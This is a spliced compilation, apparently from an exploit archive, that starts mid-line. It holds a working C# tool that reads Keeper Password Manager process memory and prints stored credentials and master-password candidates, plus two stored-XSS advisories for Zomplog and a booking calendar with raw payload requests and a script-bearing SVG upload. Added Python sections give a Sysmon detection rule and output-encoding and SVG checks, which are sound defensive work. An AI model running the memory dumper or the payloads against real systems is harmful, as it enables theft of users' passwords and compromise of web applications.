targetting the right child process - check command line public static string GetCommandLine(this Process process) { if (process is null || process.Id < 1) { return ""; } string query = $@"SELECT CommandLine FROM Win32_Process WHERE ProcessId = {process.Id}"; using (var searcher = new ManagementObjectSearcher(query)) using (var collection = searcher.Get()) { var managementObject = collection.OfType<ManagementObject>().FirstOrDefault(); return managementObject != null ? 
```csharp
                (string)managementObject["CommandLine"] : "";
            }
        }

        // Extract plain text credential JSON strings (regex inelegant but fast)
        public static void extract_credentials(string text)
        {
            int index = text.IndexOf("{\"title\":\"");
            int eindex = text.IndexOf("}");
            while (index >= 0)
            {
                try
                {
                    int endIndex = Math.Min(index + eindex, text.Length);
                    Regex reg = new Regex("(\\{\\\"title\\\"[ -~]+\\}(?=\\s))");
                    string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
                    int match_cut = match.IndexOf("} ");
                    if (match_cut != -1)
                    {
                        match = match.Substring(0, match_cut + "} ".Length).TrimEnd();
                        if (!stringsList.Contains(match) && match.Length > 20)
                        {
                            Console.WriteLine("->Credential Record Found : " + match.Substring(0, match_cut + "} ".Length) + "\n");
                            stringsList.Add(match);
                        }
                    }
                    else if (!stringsList.Contains(match.TrimEnd()) && match.Length > 20)
                    {
                        Console.WriteLine("->Credential Record Found : " + match + "\n");
                        stringsList.Add(match.TrimEnd());
                    }
                    index = text.IndexOf("{\"title\":\"", index + 1);
                    eindex = text.IndexOf("}", eindex + 1);
                }
                catch
                {
                    return;
                }
            }
        }

        // Extract account/email containing JSON string
        public static void extract_account(string text)
        {
            int index = text.IndexOf("{\"expiry\"");
            int eindex = text.IndexOf("}");
            while (index >= 0)
            {
                try
                {
                    int endIndex = Math.Min(index + eindex, text.Length);
                    Regex reg = new Regex("(\\{\\\"expiry\\\"[ -~]+@[ -~]+(?=\\}).)");
                    string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
                    if ((match.Length > 2))
                    {
                        Console.WriteLine("->Account Record Found : " + match + "\n");
                        return;
                    }
                    index = text.IndexOf("{\"expiry\"", index + 1);
                    eindex = text.IndexOf("}", eindex + 1);
                }
                catch
                {
                    return;
                }
            }
        }

        // Master password not available with SSO based logins but worth looking for.
        // Disregard other data key entries that seem to match: _not_master_key_example
        public static void extract_master(string text)
        {
            int index = text.IndexOf("data_key");
            int eindex = index + 64;
            while (index >= 0)
            {
                try
                {
                    int endIndex = Math.Min(index + eindex, text.Length);
                    Regex reg = new Regex("(data_key[ -~]+)");
                    var match_one = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
                    Regex clean = new Regex("(_[a-zA-z]{1,14}_[a-zA-Z]{1,10})");
                    if (match_one.Replace("data_key", "").Length > 5)
                    {
                        if (!clean.IsMatch(match_one.Replace("data_key", "")))
                        {
                            Console.WriteLine("->Master Password : " + match_one.Replace("data_key", "") + "\n");
                        }
                    }
                    index = text.IndexOf("data_key", index + 1);
                    eindex = index + 64;
                }
                catch
                {
                    return;
                }
            }
        }

        // Store extracted strings and compare
        public static List<string> stringsList = new List<string>();

        // Main function, iterates over private committed memory pages, reads memory and performs regex against the pages UTF-8
        // Performs OpenProcess to get handle with necessary query permissions
        static void Main(string[] args)
        {
            foreach (var process in Process.GetProcessesByName("keeperpasswordmanager"))
            {
                string commandline = GetCommandLine(process);
                if (commandline.Contains("--renderer-client-id=5") || commandline.Contains("--renderer-client-id=7"))
                {
                    Console.WriteLine("->Keeper Target PID Found: {0}", process.Id.ToString());
                    Console.WriteLine("->Searching...\n");
                    IntPtr processHandle = OpenProcess(0x00000400 | 0x00000010, false, process.Id);
                    IntPtr address = new IntPtr(0x10000000000);
                    MEMORY_BASIC_INFORMATION memInfo = new MEMORY_BASIC_INFORMATION();
                    while (VirtualQueryEx(processHandle, address, out memInfo, (uint)Marshal.SizeOf(memInfo)) != 0)
                    {
                        if (memInfo.State == 0x00001000 && memInfo.Type == 0x20000)
                        {
                            byte[] buffer = new byte[(int)memInfo.RegionSize];
                            if (NtReadVirtualMemory(processHandle, memInfo.BaseAddress, buffer, (uint)memInfo.RegionSize, IntPtr.Zero) == 0x0)
                            {
                                string text = Encoding.ASCII.GetString(buffer);
                                extract_credentials(text);
                                extract_master(text);
                                extract_account(text);
                            }
                        }
                        address = new IntPtr(memInfo.BaseAddress.ToInt64() + memInfo.RegionSize.ToInt64());
                    }
                    CloseHandle(processHandle);
                }
            }
        }

        [DllImport("kernel32.dll")]
        public static extern IntPtr OpenProcess(uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, int dwProcessId);

        [DllImport("kernel32.dll")]
        public static extern bool CloseHandle(IntPtr hObject);

        [DllImport("ntdll.dll")]
        public static extern uint NtReadVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] Buffer, UInt32 NumberOfBytesToRead, IntPtr NumberOfBytesRead);

        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern int VirtualQueryEx(IntPtr hProcess, IntPtr lpAddress, out MEMORY_BASIC_INFORMATION lpBuffer, uint dwLength);

        [StructLayout(LayoutKind.Sequential)]
        public struct MEMORY_BASIC_INFORMATION
        {
            public IntPtr BaseAddress;
            public IntPtr AllocationBase;
            public uint AllocationProtect;
            public IntPtr RegionSize;
            public uint State;
            public uint Protect;
            public uint Type;
        }
    }
```
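The tool above opens the Keeper renderer process with `OpenProcess(0x400 | 0x10)`, that is PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, and then walks committed private regions with `VirtualQueryEx` and `NtReadVirtualMemory`. That handle request is exactly what Sysmon records as Event ID 10 (ProcessAccess), with the requested rights in `GrantedAccess`. The following detection logic is an added example and is not part of the advisory or of any vendor tooling: it scans Sysmon-shaped JSON events for a handle to `keeperpasswordmanager.exe` that includes the VM_READ bit from a process outside an allowlist. The field names (`SourceImage`, `TargetImage`, `GrantedAccess`, `SourceProcessId`) are the real Sysmon Event 10 fields; the sample events and the allowlist are constructed for this example.

```python
import json

# Access rights requested by the advisory's OpenProcess call: 0x400 | 0x10
PROCESS_QUERY_INFORMATION = 0x400
PROCESS_VM_READ = 0x10

# Source images allowed to hold read handles to the password manager.
# Constructed allowlist for this example; a real one is built from baseline telemetry.
ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\lsass.exe",
}


def parse_granted_access(value):
    """Sysmon renders GrantedAccess as a hex string such as '0x410'."""
    if isinstance(value, str):
        return int(value, 16)
    return int(value)


def is_suspicious_access(event, target_name="keeperpasswordmanager.exe"):
    """True when a non-allowlisted process obtains a handle to the target
    that includes PROCESS_VM_READ (Sysmon Event ID 10, ProcessAccess)."""
    if event.get("EventID") != 10:
        return False
    target = event.get("TargetImage", "").lower()
    if not target.endswith(target_name):
        return False
    source = event.get("SourceImage", "").lower()
    if source in ALLOWLIST:
        return False
    granted = parse_granted_access(event.get("GrantedAccess", "0x0"))
    return bool(granted & PROCESS_VM_READ)


def scan_events(lines):
    """Parse newline-delimited JSON events and return one record per hit."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        if is_suspicious_access(event):
            hits.append({
                "source_pid": event.get("SourceProcessId"),
                "source": event.get("SourceImage"),
                "granted": event.get("GrantedAccess"),
            })
    return hits


# Constructed sample events in the shape of Sysmon Event ID 10 exported as JSON.
SAMPLE_EVENTS = r'''
{"EventID": 10, "SourceImage": "C:\\Users\\bob\\Desktop\\dump.exe", "SourceProcessId": 4242, "TargetImage": "C:\\Program Files\\Keeper Password Manager\\keeperpasswordmanager.exe", "TargetProcessId": 3100, "GrantedAccess": "0x410"}
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\csrss.exe", "SourceProcessId": 612, "TargetImage": "C:\\Program Files\\Keeper Password Manager\\keeperpasswordmanager.exe", "TargetProcessId": 3100, "GrantedAccess": "0x1fffff"}
{"EventID": 10, "SourceImage": "C:\\Program Files\\Tools\\monitor.exe", "SourceProcessId": 900, "TargetImage": "C:\\Program Files\\Keeper Password Manager\\keeperpasswordmanager.exe", "TargetProcessId": 3100, "GrantedAccess": "0x400"}
{"EventID": 1, "Image": "C:\\Windows\\explorer.exe", "ProcessId": 5000}
'''

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS.splitlines()):
        print("ALERT: %(source)s (pid %(source_pid)s) opened the password manager with %(granted)s" % hit)
```

Only the first sample event fires: `0x410` carries the VM_READ bit and `dump.exe` is not allowlisted, while `monitor.exe` asked for query rights only and `csrss.exe` is expected to hold a full handle. In practice the Keeper process tree opens its own renderers, so the allowlist should also cover the product's own images, derived from a baseline rather than guessed.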
  24. Exploit Title: Zomplog 3.9 - Cross-site scripting (XSS)
Application: Zomplog
Version: v3.9
Bugs: XSS
Technology: PHP
Vendor URL: http://zomp.nl/zomplog/
Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
Date of found: 22.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================
steps:
1. Login to account
2. Add new page
3. Set as <img src=x onerror=alert(4)>
4. Go to menu

Poc request:

POST /zimplitcms/zimplit.php?action=copyhtml&file=index.html&newname=img_src=x_onerror=alert(5).html&title=%3Cimg%20src%3Dx%20onerror%3Dalert(5)%3E HTTP/1.1
Host: localhost
Content-Length: 11
sec-ch-ua:
Accept: */*
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/zimplitcms/zimplit.php?action=load&file=index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ZsessionLang=en; ZsessionId=tns0pu8urk9nl78nivpm; ZeditorData=sidemenuStatus:open
Connection: close

empty=empty
  25. # Exploit Title: Availability Booking Calendar v1.0 - Multiple Cross-site scripting (XSS)
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Tested on: Ubuntu 20.04
# Blog: http://msecureltd.blogspot.com

XSS #1:

Steps to Reproduce:
1. Browse to Bookings
2. Select All Bookings
3. Edit booking and select Promo Code
4. Enter payload TEST"><script>alert(`XSS`)</script>

// HTTP POST request

POST /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]
[...]
edit_booking=1&calendars_price=900&extra_price=0&tax=10&deposit=91&promo_code=TEST%22%3E%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E&discount=0&total=910&create_booking=1
[...]

// HTTP response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 205
[...]

// HTTP GET request to Bookings page

GET /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit&id=2 HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]

// HTTP response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 33590
[...]
[...]
<label class="control-label" for="promo_code">Promo code:</label>
<input id="promo_code" class="form-control input-sm" type="text" name="promo_code" size="25" value=TEST"><script>alert(`XSS`)</script>" title="Promo code" placeholder="">
</div>
[...]

Unrestricted File Upload #1:

// SVG file contents

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(`XSS`);
</script>
</svg>

Steps to Reproduce:
1. Browse My Account
2. Image Browse -> Upload
3. Then right click on image
4. Select Open Image in New Tab

// HTTP POST request

POST /AvailabilityBookingCalendarPHP/index.php?controller=GzUser&action=edit&id=1 HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]
[...]
-----------------------------13831219578609189241212424546
Content-Disposition: form-data; name="img"; filename="xss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(`XSS`);
</script>
</svg>
[...]

// HTTP response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 190
[...]
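The two stored XSS posts above (Zomplog, and the Availability Booking Calendar promo code) both come down to user-supplied text being written into HTML without output encoding; the response in the second post shows the `value=` attribute emitted unquoted and unencoded, so the `"` and `>` in the payload end the attribute and the tag. The SVG upload is the same class of problem at the file level: an SVG is an XML document that may carry `<script>`, and a browser opening it directly will run it. The block below is an added example, written for this page and not taken from either advisory or from the affected products: it reproduces the unencoded rendering beside the fixed version, and adds a simple upload check that parses the SVG and rejects script elements, `on*` event handlers and `javascript:` hrefs. The function names and the blocked-element policy are my own; the malicious sample is the advisory's SVG, and the benign sample is constructed.

```python
import html
import xml.etree.ElementTree as ET

# The promo_code payload from the advisory above (used here as test input only).
PAYLOAD = 'TEST"><script>alert(`XSS`)</script>'


def render_promo_input_vulnerable(value):
    """Reproduces the response shown in the advisory: the attribute value is
    interpolated without quotes or encoding, so '"' and '>' close the attribute
    and the tag, and whatever follows is parsed as markup."""
    return ('<input id="promo_code" type="text" name="promo_code" '
            'value=%s title="Promo code">' % value)


def render_promo_input_fixed(value):
    """Quote the attribute and HTML-encode the value: &, <, >, " and ' become
    entities, so the browser keeps the whole value inside the attribute."""
    return ('<input id="promo_code" type="text" name="promo_code" '
            'value="%s" title="Promo code">' % html.escape(value, quote=True))


# Elements that carry script or active content in SVG; hypothetical policy for this example.
BLOCKED_SVG_ELEMENTS = {"script", "foreignobject", "set", "animate", "iframe", "embed", "object"}


def _local_name(qualified):
    """Strip the '{namespace}' prefix ElementTree puts on tag and attribute names."""
    return qualified.rsplit("}", 1)[-1].lower()


def svg_is_safe(data):
    """Return (ok, reason) for an uploaded SVG. Parses it as XML and rejects
    script elements, on* event-handler attributes and javascript: hrefs.
    Serving uploads with Content-Disposition: attachment is a further defence not shown here."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return False, "not well-formed XML: %s" % exc
    if _local_name(root.tag) != "svg":
        return False, "root element is not <svg>"
    for elem in root.iter():
        name = _local_name(elem.tag)
        if name in BLOCKED_SVG_ELEMENTS:
            return False, "disallowed element <%s>" % name
        for attr, value in elem.attrib.items():
            attr_name = _local_name(attr)
            if attr_name.startswith("on"):
                return False, "event handler attribute %s" % attr_name
            if attr_name == "href" and value.strip().lower().startswith("javascript:"):
                return False, "active href in <%s>" % name
    return True, "ok"


# Constructed samples: the advisory's SVG with its script element, and a benign variant.
MALICIOUS_SVG = b'''<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">alert(`XSS`);</script>
</svg>'''

BENIGN_SVG = b'''<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
</svg>'''

if __name__ == "__main__":
    print(render_promo_input_vulnerable(PAYLOAD))
    print(render_promo_input_fixed(PAYLOAD))
    print(svg_is_safe(MALICIOUS_SVG))
    print(svg_is_safe(BENIGN_SVG))
```

The encoded output keeps the payload inside `value="TEST&quot;&gt;&lt;script&gt;..."`, which the browser shows as literal text in the field. The SVG check is an allow-by-parse policy rather than a string search, so a `<script>` element is caught whether or not it carries a namespace prefix; the same validator should run on every image upload path, not only the profile image shown in the post.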